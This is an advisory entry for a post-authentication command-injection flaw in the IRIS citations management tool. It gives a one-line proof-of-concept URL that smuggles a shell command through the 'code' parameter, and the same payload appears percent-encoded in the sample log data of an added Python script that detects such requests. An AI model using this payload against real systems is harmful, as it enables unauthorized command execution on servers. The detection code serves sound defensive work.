IRIS Citations Management Tool Command Execution

Vulnerability ID 1045609 Vulnerability type
Published 2013-02-13 Updated 2013-02-13
CVE ID N/A CNNVD-ID N/A
Platform N/A CVSS score N/A
|Source
https://cxsecurity.com/issue/WLB-2013020092
|Vulnerability details
Vulnerability details have not yet been disclosed
|Exploit
A vulnerability exists in IRIS citations management tool which allows a low privileged attacker to execute arbitrary commands.

Details can be found on my blog:
https://infosecabsurdity.wordpress.com/2013/02/09/iris-citations-management-tool-post-auth-remote-command-execution/ 

PoC:

http://[target]/[path]/index.php?p=add&import=spnro&code=a"+-T+0.1+||echo+`id`+>+/tmp/luls||"

~ aeon
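
Detection logic for the request shape shown in the PoC, as an added example that is not part of the original advisory: it scans web access logs for requests to `index.php?p=add&import=spnro` whose decoded `code` parameter contains shell metacharacters. The combined log format, the `/iris/` path, and the addresses and user names in the sample lines are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Characters a shell treats specially once the value reaches a command line.
SHELL_META = re.compile(r"""["'`|;&$<>(){}\\\n\r]""")
# Request line inside a combined-format access-log entry (assumed format).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')


def suspicious_code_param(target):
    """Return the decoded `code` value when the request matches the PoC's
    handler (p=add, import=spnro) and `code` holds shell metacharacters."""
    parts = urlsplit(target)
    if not parts.path.endswith("/index.php"):
        return None
    qs = parse_qs(parts.query, keep_blank_values=True)
    if qs.get("p") != ["add"] or qs.get("import") != ["spnro"]:
        return None
    for value in qs.get("code", []):
        if SHELL_META.search(value):
            return value
    return None


def scan(lines):
    """Return (line_number, decoded_code_value) for every flagged entry."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = REQUEST.search(line)
        if match:
            value = suspicious_code_param(match.group(1))
            if value is not None:
                hits.append((number, value))
    return hits


# Constructed log lines: a normal import, the PoC shape percent-encoded,
# and a request to a different page that must not be flagged.
SAMPLE = [
    '192.0.2.10 - alice [13/Feb/2013:10:00:01 +0000] "GET /iris/index.php?p=add&import=spnro&code=12345678 HTTP/1.1" 200 5120',
    '192.0.2.44 - bob [13/Feb/2013:10:02:17 +0000] "GET /iris/index.php?p=add&import=spnro&code=a%22+-T+0.1+%7C%7Cecho+%60id%60+%3E+/tmp/luls%7C%7C%22 HTTP/1.1" 200 5098',
    '192.0.2.10 - alice [13/Feb/2013:10:03:40 +0000] "GET /iris/index.php?p=list&code=a%7Cb HTTP/1.1" 200 2210',
]

if __name__ == "__main__":
    for lineno, value in scan(SAMPLE):
        print(f"line {lineno}: code={value!r}")
```

Because the issue is post-authentication, the authenticated user field of a flagged log entry identifies the account to review.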